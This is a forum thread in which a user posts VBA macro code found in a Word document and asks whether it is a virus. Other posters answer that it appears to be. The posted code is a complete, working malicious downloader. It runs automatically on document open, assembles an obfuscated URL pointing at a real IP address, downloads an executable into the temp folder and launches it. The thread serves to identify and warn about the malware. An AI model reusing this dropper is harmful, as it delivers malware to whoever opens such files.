Is this a virus? What does this VBA code do?

[broncosrul]

Okay, technically the VBA was in a Word document, but the smartest VBA people are on this board. Hopefully, it is all transferable. Here are the details.

Word Doc with instructions to take it out of read only mode and enable content. Nothing else. Then I panicked about the VBA I had just unlocked and this is what I found. However, I don't know enough about VBA to read it.

#If Win64 Then
Private Declare PtrSafe Function XSS Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal hWnd As Long, ByVal lpOperation As String, _
ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long
#Else
Private Declare Function XSS Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal hWnd As Long, ByVal lpOperation As String, _
ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long
#End If


Sub Document_Open()
Dim a As String
Dim b As String
Dim c As Long
Dim d As Long
d = 0
a = Environ("tmp")
b = "xe"
a = a & "\lf.e" & b
b = "http" & "://148" & ".251.248" & ".4/images/si" & "gchk.e" & "xe"
Dim oXMLHTTP As MSXML2.XMLHTTP30, vFF As Long, oResp() As Byte
Set oXMLHTTP = New MSXML2.XMLHTTP30
oXMLHTTP.Open "GET", b, False
oXMLHTTP.send
If oXMLHTTP.Status = 200 Then
    vFF = FreeFile
    oResp = xss2(oXMLHTTP)
    Open a For Binary As #vFF
    Put #vFF, , oResp
    Close #vFF
End If
XSS 0, "o" & "pen", a, "", vbNullString, vbNormalFocus
End Sub

Function xss2(ByRef a As MSXML2.XMLHTTP30) As Byte()
Dim oResp() As Byte
oResp = a.responseBody
xss2 = oResp
End Function

Should I be worried? Thanks in advance for any help you can provide.

 

[Rick Rothstein]

I have a general rule regarding code... if I don't know source as being reputable and/or I don't know what the code is supposed to do, I don't run it... ever... especially code that appears to go out to a web site and do some unknown thing there like the code you posted seems to want to do. The structure of the code "looks" normal enough, but why take the chance.

 

[broncosrul]

I totally agree. I wouldn't normally run code that I was not familiar with. Especially, when I also see it links to some unknown website. My concern was that it somehow auto-ran when I enabled the content of the file. So, that is why I was hoping someone could look at it and tell me what it accomplished. Then I would know if I should panic about it. If I actually have to run the code myself, then I am not worried. But I am more concerned it ran itself behind the scenes.

Thanks

 

[Leith Ross]

Hello broncosrul,

I strongly suspect this is virus. First, the code has been obfuscated to escape detection by anti-virus programs. Second, it opens and downloads an executable program to your "Temp" directory. The IP address indicates the server is in Denmark.